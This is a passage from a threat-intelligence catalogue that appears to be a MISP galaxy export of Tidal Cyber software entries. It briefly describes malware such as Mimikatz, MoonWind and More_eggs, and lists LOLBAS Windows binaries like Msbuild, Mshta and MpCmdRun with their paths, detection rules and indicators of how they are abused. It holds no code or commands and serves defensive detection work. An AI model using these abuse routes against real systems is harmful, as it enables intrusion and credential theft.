* BlockRule: [https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules)
* IOC: Microsoft.Workflow.Compiler.exe would not normally be run on workstations.
* IOC: The presence of csc.exe or vbc.exe as child processes of Microsoft.Workflow.Compiler.exe
* IOC: Presence of "<CompilerInput" in a text file.<sup>[[Microsoft.Workflow.Compiler.exe - LOLBAS Project](/references/1e659b32-a06f-45dc-a1eb-03f1a42c55ef)]</sup>

The tag is: misp-galaxy:software="Microsoft.Workflow.Compiler"

James - Associated Software

<sup>[[Accenture Lyceum Targets November 2021](https://app.tidalcyber.com/references/127836ce-e459-405d-a75c-32fd5f0ab198)]</sup>

The tag is: misp-galaxy:software="James - Associated Software"

Milan

The tag is: misp-galaxy:software="Milan"

Mimikatz

[Mimikatz](https://app.tidalcyber.com/software/b8e7c0b4-49e4-4e8d-9467-b17f305ddf16) is a credential dumper capable of obtaining plaintext Windows account logins and passwords, along with many other features that make it useful for testing the security of networks. <sup>[[Deply Mimikatz](https://app.tidalcyber.com/references/c92d890c-2839-433a-b458-f663e66e1c63)]</sup> <sup>[[Adsecurity Mimikatz Guide](https://app.tidalcyber.com/references/b251ed65-a145-4053-9dc2-bf0dad83d76c)]</sup>

The tag is: misp-galaxy:software="Mimikatz"

MimiPenguin

[MimiPenguin](https://app.tidalcyber.com/software/42350632-b59a-4cc5-995e-d95d8c608553) is a credential dumper, similar to [Mimikatz](https://app.tidalcyber.com/software/b8e7c0b4-49e4-4e8d-9467-b17f305ddf16), designed specifically for Linux platforms. <sup>[[MimiPenguin GitHub May 2017](https://app.tidalcyber.com/references/b10cd6cc-35ed-4eac-b213-110de28f33ef)]</sup>

The tag is: misp-galaxy:software="MimiPenguin"

Miner-C

[Miner-C](https://app.tidalcyber.com/software/c0dea9db-1551-4f6c-8a19-182efc34093a) is malware that mines victims for the Monero cryptocurrency. It has targeted FTP servers and Network Attached Storage (NAS) devices to spread. <sup>[[Softpedia MinerC](https://app.tidalcyber.com/references/087b9bf1-bd9e-4cd6-a386-d9d2c812c927)]</sup>

The tag is: misp-galaxy:software="Miner-C"

MiniDuke

The tag is: misp-galaxy:software="MiniDuke"

MirageFox

[MirageFox](https://app.tidalcyber.com/software/535f1b97-7a70-4d18-be4e-3a9f74ccf78a) is a remote access tool used against Windows systems. It appears to be an upgraded version of a tool known as Mirage, which is a RAT believed to originate in 2012. <sup>[[APT15 Intezer June 2018](https://app.tidalcyber.com/references/0110500c-bf67-43a5-97cb-16eb6c01040b)]</sup>

The tag is: misp-galaxy:software="MirageFox"

Misdat

The tag is: misp-galaxy:software="Misdat"

Mis-Type

The tag is: misp-galaxy:software="Mis-Type"

Mivast

[Mivast](https://app.tidalcyber.com/software/f603ea32-91c3-4b62-a60f-57670433b080) is a backdoor that has been used by [Deep Panda](https://app.tidalcyber.com/groups/43f826a1-e8c8-47b8-9b00-38e1b3e4293b). It was reportedly used in the Anthem breach. <sup>[[Symantec Black Vine](https://app.tidalcyber.com/references/0b7745ce-04c0-41d9-a440-df9084a45d09)]</sup>

The tag is: misp-galaxy:software="Mivast"

Mmc.exe - Associated Software

<sup>[[Mmc.exe - LOLBAS Project](/references/490b6769-e386-4a3d-972e-5a919cb2f6f5)]</sup>

The tag is: misp-galaxy:software="Mmc.exe - Associated Software"

Mmc

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Load snap-ins to locally and remotely manage Windows systems

Author: @bohops

Paths:
* C:\Windows\System32\mmc.exe
* C:\Windows\SysWOW64\mmc.exe

Detection:
* Sigma: [proc_creation_win_mmc_susp_child_process.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mmc_susp_child_process.yml)
* Sigma: file_event_win_uac_bypass_dotnet_profiler.yml<sup>[[Mmc.exe - LOLBAS Project](/references/490b6769-e386-4a3d-972e-5a919cb2f6f5)]</sup>

The tag is: misp-galaxy:software="Mmc"

MobileOrder

[MobileOrder](https://app.tidalcyber.com/software/116f913c-0d5e-43d1-ba0d-3a12127af8f6) is a Trojan intended to compromise Android mobile devices. It has been used by [Scarlet Mimic](https://app.tidalcyber.com/groups/6c1bdc51-f633-4512-8b20-04a11c2d97f4). <sup>[[Scarlet Mimic Jan 2016](https://app.tidalcyber.com/references/f84a5b6d-3af1-45b1-ac55-69ceced8735f)]</sup>

The tag is: misp-galaxy:software="MobileOrder"

MoleNet

[MoleNet](https://app.tidalcyber.com/software/7ca5debb-f813-4e06-98f8-d1186552e5d2) is a downloader tool with backdoor capabilities that has been observed in use since at least 2019.<sup>[[Cybereason Molerats Dec 2020](https://app.tidalcyber.com/references/81a10a4b-c66f-4526-882c-184436807e1d)]</sup>

The tag is: misp-galaxy:software="MoleNet"

Mongall

The tag is: misp-galaxy:software="Mongall"

MoonWind

[MoonWind](https://app.tidalcyber.com/software/a699f32f-6596-4060-8fcd-42587a844b80) is a remote access tool (RAT) that was used in 2016 to target organizations in Thailand. <sup>[[Palo Alto MoonWind March 2017](https://app.tidalcyber.com/references/4f3d7a08-2cf5-49ed-8bcd-6df180f3d194)]</sup>

The tag is: misp-galaxy:software="MoonWind"

SKID - Associated Software

The tag is: misp-galaxy:software="SKID - Associated Software"

Terra Loader - Associated Software

The tag is: misp-galaxy:software="Terra Loader - Associated Software"

SpicyOmelette - Associated Software

<sup>[[Security Intelligence More Eggs Aug 2019](https://app.tidalcyber.com/references/f0a0286f-adb9-4a6e-85b5-5b0f45e6fbf3)]</sup>

The tag is: misp-galaxy:software="SpicyOmelette - Associated Software"

More_eggs

[More_eggs](https://app.tidalcyber.com/software/69f202e7-4bc9-4f4f-943f-330c053ae977) is a JScript backdoor used by [Cobalt Group](https://app.tidalcyber.com/groups/58db02e6-d908-47c2-bc82-ed58ada61331) and [FIN6](https://app.tidalcyber.com/groups/fcaadc12-7c17-4946-a9dc-976ed610854c). Its name was given based on the variable "More_eggs" being present in its code. There are at least two different versions of the backdoor being used, version 2.0 and version 4.4. <sup>[[Talos Cobalt Group July 2018](https://app.tidalcyber.com/references/7cdfd0d1-f7e6-4625-91ff-f87f46f95864)]</sup><sup>[[Security Intelligence More Eggs Aug 2019](https://app.tidalcyber.com/references/f0a0286f-adb9-4a6e-85b5-5b0f45e6fbf3)]</sup>

The tag is: misp-galaxy:software="More_eggs"

Mori

[Mori](https://app.tidalcyber.com/software/385e1eaf-9ba8-4381-981a-3c7af718a77d) is a backdoor that has been used by [MuddyWater](https://app.tidalcyber.com/groups/dcb260d8-9d53-404f-9ff5-dbee2c6effe6) since at least January 2022.<sup>[[DHS CISA AA22-055A MuddyWater February 2022](https://app.tidalcyber.com/references/e76570e1-43ab-4819-80bc-895ede67a205)]</sup><sup>[[CYBERCOM Iranian Intel Cyber January 2022](https://app.tidalcyber.com/references/671e1559-c7dc-4cb4-a9a1-21776f2ae56a)]</sup>

The tag is: misp-galaxy:software="Mori"

Mosquito

[Mosquito](https://app.tidalcyber.com/software/c3939dad-d728-4ddb-804e-cf1e3743a55d) is a Win32 backdoor that has been used by [Turla](https://app.tidalcyber.com/groups/47ae4fb1-fc61-4e8e-9310-66dda706e1a2). [Mosquito](https://app.tidalcyber.com/software/c3939dad-d728-4ddb-804e-cf1e3743a55d) is made up of three parts: the installer, the launcher, and the backdoor. The main backdoor is called CommanderDLL and is launched by the loader program. <sup>[[ESET Turla Mosquito Jan 2018](https://app.tidalcyber.com/references/cd177c2e-ef22-47be-9926-61e25fd5f33b)]</sup>

The tag is: misp-galaxy:software="Mosquito"

MpCmdRun.exe - Associated Software

<sup>[[MpCmdRun.exe - LOLBAS Project](/references/2082d5ca-474f-4130-b275-c1ac5e30064c)]</sup>

The tag is: misp-galaxy:software="MpCmdRun.exe - Associated Software"

MpCmdRun

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Binary part of Windows Defender. Used to manage settings in Windows Defender

Author: Oddvar Moe

Paths:
* C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.4-0\MpCmdRun.exe
* C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.7-0\MpCmdRun.exe
* C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe

Detection:
* Sigma: [win_susp_mpcmdrun_download.yml](https://github.com/SigmaHQ/sigma/blob/159bf4bbc103cc2be3fef4b7c2e7c8b23b63fd10/rules/windows/process_creation/win_susp_mpcmdrun_download.yml)
* Elastic: [command_and_control_remote_file_copy_mpcmdrun.toml](https://github.com/elastic/detection-rules/blob/6ef5c53b0c15e344f0f2d1649941391aea6fa253/rules/windows/command_and_control_remote_file_copy_mpcmdrun.toml)
* IOC: MpCmdRun storing data into alternate data streams.
* IOC: MpCmdRun retrieving a file from a remote machine or the internet that is not expected.
* IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching mpcmdrun.exe.
* IOC: Monitor for the creation of %USERPROFILE%\AppData\Local\Temp\MpCmdRun.log
* IOC: User Agent is "MpCommunication"<sup>[[MpCmdRun.exe - LOLBAS Project](/references/2082d5ca-474f-4130-b275-c1ac5e30064c)]</sup>

The tag is: misp-galaxy:software="MpCmdRun"

Msbuild.exe - Associated Software

<sup>[[LOLBAS Msbuild](/references/de8e0741-255b-4c41-ba50-248ac5acc325)]</sup>

The tag is: misp-galaxy:software="Msbuild.exe - Associated Software"

Msbuild

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Used to compile and execute code

Author: Oddvar Moe

Paths:
* C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe
* C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Msbuild.exe
* C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe
* C:\Windows\Microsoft.NET\Framework64\v3.5\Msbuild.exe
* C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
* C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Msbuild.exe
* C:\Program Files (x86)\MSBuild\14.0\bin\MSBuild.exe

Detection:
* Sigma: [file_event_win_shell_write_susp_directory.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_shell_write_susp_directory.yml)
* Sigma: [proc_creation_win_msbuild_susp_parent_process.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_msbuild_susp_parent_process.yml)
* Sigma: [net_connection_win_silenttrinity_stager_msbuild_activity.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_silenttrinity_stager_msbuild_activity.yml)
* Splunk: [suspicious_msbuild_spawn.yml](https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_msbuild_spawn.yml)
* Splunk: [suspicious_msbuild_rename.yml](https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_msbuild_rename.yml)
* Splunk: [msbuild_suspicious_spawned_by_script_process.yml](https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/msbuild_suspicious_spawned_by_script_process.yml)
* Elastic: [defense_evasion_msbuild_beacon_sequence.toml](https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_msbuild_beacon_sequence.toml)
* Elastic: [defense_evasion_msbuild_making_network_connections.toml](https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_msbuild_making_network_connections.toml)
* Elastic: [defense_evasion_execution_msbuild_started_by_script.toml](https://github.com/elastic/detection-rules/blob/ef7548f04c4341e0d1a172810330d59453f46a21/rules/windows/defense_evasion_execution_msbuild_started_by_script.toml)
* Elastic: [defense_evasion_execution_msbuild_started_by_office_app.toml](https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml)
* Elastic: [defense_evasion_execution_msbuild_started_renamed.toml](https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_execution_msbuild_started_renamed.toml)
* BlockRule: [https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules)
* IOC: Msbuild.exe should not normally be executed on workstations<sup>[[LOLBAS Msbuild](/references/de8e0741-255b-4c41-ba50-248ac5acc325)]</sup>

The tag is: misp-galaxy:software="Msbuild"

Msconfig.exe - Associated Software

<sup>[[Msconfig.exe - LOLBAS Project](/references/a073d2fc-d20d-4a52-944e-85ff89f04978)]</sup>

The tag is: misp-galaxy:software="Msconfig.exe - Associated Software"

Msconfig

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: MSConfig is a troubleshooting tool which is used to temporarily disable or re-enable software, device drivers or Windows services that run during startup process to help the user determine the cause of a problem with Windows

Author: Oddvar Moe

Paths:
* C:\Windows\System32\msconfig.exe

Detection:
* Sigma: [proc_creation_win_uac_bypass_msconfig_gui.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_uac_bypass_msconfig_gui.yml)
* Sigma: [file_event_win_uac_bypass_msconfig_gui.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/file/file_event/file_event_win_uac_bypass_msconfig_gui.yml)
* IOC: mscfgtlc.xml changes in system32 folder<sup>[[Msconfig.exe - LOLBAS Project](/references/a073d2fc-d20d-4a52-944e-85ff89f04978)]</sup>

The tag is: misp-galaxy:software="Msconfig"

Msdeploy.exe - Associated Software

<sup>[[Msdeploy.exe - LOLBAS Project](/references/e563af9a-5e49-4612-a52b-31f22f76193c)]</sup>

The tag is: misp-galaxy:software="Msdeploy.exe - Associated Software"

Msdeploy

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Microsoft tool used to deploy Web Applications.

Author: Oddvar Moe

Paths:
* C:\Program Files (x86)\IIS\Microsoft Web Deploy V3\msdeploy.exe

Detection:
* Sigma: proc_creation_win_lolbin_msdeploy.yml<sup>[[Msdeploy.exe - LOLBAS Project](/references/e563af9a-5e49-4612-a52b-31f22f76193c)]</sup>

The tag is: misp-galaxy:software="Msdeploy"

Msdt.exe - Associated Software

<sup>[[Msdt.exe - LOLBAS Project](/references/3eb1750c-a2f2-4d68-b060-ceb32f44f5fe)]</sup>

The tag is: misp-galaxy:software="Msdt.exe - Associated Software"

Msdt

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Microsoft diagnostics tool

Author: Oddvar Moe

Paths: * C:\Windows\System32\Msdt.exe * C:\Windows\SysWOW64\Msdt.exe

Detection: * Sigma: [proc_creation_win_lolbin_msdt_answer_file.yml](https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_msdt_answer_file.yml) * Sigma: [proc_creation_win_msdt_arbitrary_command_execution.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msdt_arbitrary_command_execution.yml) * Elastic: defense_evasion_network_connection_from_windows_binary.toml<sup>[[Msdt.exe - LOLBAS Project](/references/3eb1750c-a2f2-4d68-b060-ceb32f44f5fe)]</sup>

The tag is: misp-galaxy:software="Msdt"

Msedge.exe - Associated Software

<sup>[[Msedge.exe - LOLBAS Project](/references/6169c12e-9753-4e48-8213-aff95b0f6a95)]</sup>

The tag is: misp-galaxy:software="Msedge.exe - Associated Software"

Msedge

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Microsoft Edge browser

Author: mr.d0x

Paths: * c:\Program Files\Microsoft\Edge\Application\msedge.exe * c:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Detection: * Sigma: [proc_creation_win_browsers_msedge_arbitrary_download.yml](https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_browsers_msedge_arbitrary_download.yml) * Sigma: proc_creation_win_browsers_chromium_headless_file_download.yml<sup>[[Msedge.exe - LOLBAS Project](/references/6169c12e-9753-4e48-8213-aff95b0f6a95)]</sup>

The tag is: misp-galaxy:software="Msedge"

msedge_proxy.exe - Associated Software

<sup>[[msedge_proxy.exe - LOLBAS Project](/references/a6fd4727-e22f-4157-9a5f-1217cb876b32)]</sup>

The tag is: misp-galaxy:software="msedge_proxy.exe - Associated Software"

msedge_proxy

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Microsoft Edge Browser

Author: Mert Daş

Paths: * C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe

Resources: None Provided

Detection: None Provided<sup>[[msedge_proxy.exe - LOLBAS Project](/references/a6fd4727-e22f-4157-9a5f-1217cb876b32)]</sup>

The tag is: misp-galaxy:software="msedge_proxy"

msedgewebview2.exe - Associated Software

<sup>[[msedgewebview2.exe - LOLBAS Project](/references/8125ece7-10d1-4e79-8ea1-724fe46a3c97)]</sup>

The tag is: misp-galaxy:software="msedgewebview2.exe - Associated Software"

msedgewebview2

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: msedgewebview2.exe is the executable file for Microsoft Edge WebView2, which is a web browser control used by applications to display web content.

Author: Matan Bahar

Paths: * C:\Program Files (x86)\Microsoft\Edge\Application\114.0.1823.43\msedgewebview2.exe

Detection: * IOC: msedgewebview2.exe spawned with any of the following: --gpu-launcher, --utility-cmd-prefix, --renderer-cmd-prefix, --browser-subprocess-path<sup>[[msedgewebview2.exe - LOLBAS Project](/references/8125ece7-10d1-4e79-8ea1-724fe46a3c97)]</sup>

The tag is: misp-galaxy:software="msedgewebview2"

Mshta.exe - Associated Software

<sup>[[LOLBAS Mshta](/references/915a4aef-800e-4c68-ad39-df67c3dbaf75)]</sup>

The tag is: misp-galaxy:software="Mshta.exe - Associated Software"

Mshta

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Used by Windows to execute HTML applications (.hta).

Author: Oddvar Moe

Paths: * C:\Windows\System32\mshta.exe * C:\Windows\SysWOW64\mshta.exe

Detection: * Sigma: [proc_creation_win_mshta_susp_pattern.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mshta_susp_pattern.yml) * Sigma: [proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml) * Sigma: [proc_creation_win_mshta_lethalhta_technique.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mshta_lethalhta_technique.yml) * Sigma: [proc_creation_win_mshta_javascript.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mshta_javascript.yml) * Sigma: [file_event_win_net_cli_artefact.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml) * Sigma: [image_load_susp_script_dotnet_clr_dll_load.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/image_load/image_load_susp_script_dotnet_clr_dll_load.yml) * Elastic: [defense_evasion_mshta_beacon.toml](https://github.com/elastic/detection-rules/blob/f8f643041a584621e66cf8e6d534ad3db92edc29/rules/windows/defense_evasion_mshta_beacon.toml) * Elastic: [lateral_movement_dcom_hta.toml](https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/lateral_movement_dcom_hta.toml) * Elastic: [defense_evasion_suspicious_managedcode_host_process.toml](https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml) * Splunk: [suspicious_mshta_activity.yml](https://github.com/splunk/security_content/blob/08ed88bd88259c03c771c30170d2934ed0a8f878/stories/suspicious_mshta_activity.yml) * Splunk: [detect_mshta_renamed.yml](https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_mshta_renamed.yml) * Splunk: [suspicious_mshta_spawn.yml](https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_mshta_spawn.yml) * Splunk: [suspicious_mshta_child_process.yml](https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_mshta_child_process.yml) * Splunk: [detect_mshta_url_in_command_line.yml](https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_mshta_url_in_command_line.yml) * BlockRule: [https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules) * IOC: mshta.exe executing raw or obfuscated script within the command-line * IOC: General usage of HTA file * IOC: mshta.exe network connection to Internet/WWW resource * IOC: DotNet CLR libraries loaded into mshta.exe * IOC: DotNet CLR Usage Log - mshta.exe.log<sup>[[LOLBAS Mshta](/references/915a4aef-800e-4c68-ad39-df67c3dbaf75)]</sup>

The tag is: misp-galaxy:software="Mshta"

Mshtml.dll - Associated Software

<sup>[[Mshtml.dll - LOLBAS Project](/references/1a135e0b-5a79-4a4c-bc70-fd8f3f84e1f0)]</sup>

The tag is: misp-galaxy:software="Mshtml.dll - Associated Software"

Mshtml

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Microsoft HTML Viewer

Author: LOLBAS Team

Paths: * c:\windows\system32\mshtml.dll * c:\windows\syswow64\mshtml.dll

Detection: * Sigma: proc_creation_win_rundll32_susp_activity.yml<sup>[[Mshtml.dll - LOLBAS Project](/references/1a135e0b-5a79-4a4c-bc70-fd8f3f84e1f0)]</sup>

The tag is: misp-galaxy:software="Mshtml"

Msiexec.exe - Associated Software

<sup>[[LOLBAS Msiexec](/references/996cc7ea-0729-4c51-b9c3-b201ec32e984)]</sup>

The tag is: misp-galaxy:software="Msiexec.exe - Associated Software"

Msiexec

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Used by Windows to execute msi files

Author: Oddvar Moe

Paths: * C:\Windows\System32\msiexec.exe * C:\Windows\SysWOW64\msiexec.exe

The tag is: misp-galaxy:software="Msiexec"

MsoHtmEd.exe - Associated Software

<sup>[[MsoHtmEd.exe - LOLBAS Project](/references/c39fdefa-4c54-48a9-8357-ffe4dca2a2f4)]</sup>

The tag is: misp-galaxy:software="MsoHtmEd.exe - Associated Software"

MsoHtmEd

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Microsoft Office component

Author: Nir Chako

Paths: * C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\MSOHTMED.exe * C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\MSOHTMED.exe * C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.exe * C:\Program Files\Microsoft Office\Office16\MSOHTMED.exe * C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\MSOHTMED.exe * C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\MSOHTMED.exe * C:\Program Files (x86)\Microsoft Office\Office15\MSOHTMED.exe * C:\Program Files\Microsoft Office\Office15\MSOHTMED.exe * C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\MSOHTMED.exe * C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\MSOHTMED.exe * C:\Program Files (x86)\Microsoft Office\Office14\MSOHTMED.exe * C:\Program Files\Microsoft Office\Office14\MSOHTMED.exe * C:\Program Files (x86)\Microsoft Office\Office12\MSOHTMED.exe * C:\Program Files\Microsoft Office\Office12\MSOHTMED.exe

Resources: None Provided

Detection: * Sigma: [proc_creation_win_lolbin_msohtmed_download.yml](https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_msohtmed_download.yml) * IOC: Suspicious Office application internet/network traffic<sup>[[MsoHtmEd.exe - LOLBAS Project](/references/c39fdefa-4c54-48a9-8357-ffe4dca2a2f4)]</sup>

The tag is: misp-galaxy:software="MsoHtmEd"

Mspub.exe - Associated Software

<sup>[[Mspub.exe - LOLBAS Project](/references/41eff63a-fef0-4b4b-86f7-0908150fcfcf)]</sup>

The tag is: misp-galaxy:software="Mspub.exe - Associated Software"

Mspub

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Microsoft Publisher

Author: Nir Chako

Paths: * C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\MSPUB.exe * C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\MSPUB.exe * C:\Program Files (x86)\Microsoft Office\Office16\MSPUB.exe * C:\Program Files\Microsoft Office\Office16\MSPUB.exe * C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\MSPUB.exe * C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\MSPUB.exe * C:\Program Files (x86)\Microsoft Office\Office15\MSPUB.exe * C:\Program Files\Microsoft Office\Office15\MSPUB.exe * C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\MSPUB.exe * C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\MSPUB.exe * C:\Program Files (x86)\Microsoft Office\Office14\MSPUB.exe * C:\Program Files\Microsoft Office\Office14\MSPUB.exe

Resources: None Provided

Detection: * Sigma: [proc_creation_win_lolbin_mspub_download.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_mspub_download.yml) * IOC: Suspicious Office application internet/network traffic<sup>[[Mspub.exe - LOLBAS Project](/references/41eff63a-fef0-4b4b-86f7-0908150fcfcf)]</sup>

The tag is: misp-galaxy:software="Mspub"

msxsl.exe - Associated Software

<sup>[[msxsl.exe - LOLBAS Project](/references/4e1ed0a8-60d0-45e2-9592-573b904811f8)]</sup>

The tag is: misp-galaxy:software="msxsl.exe - Associated Software"

msxsl

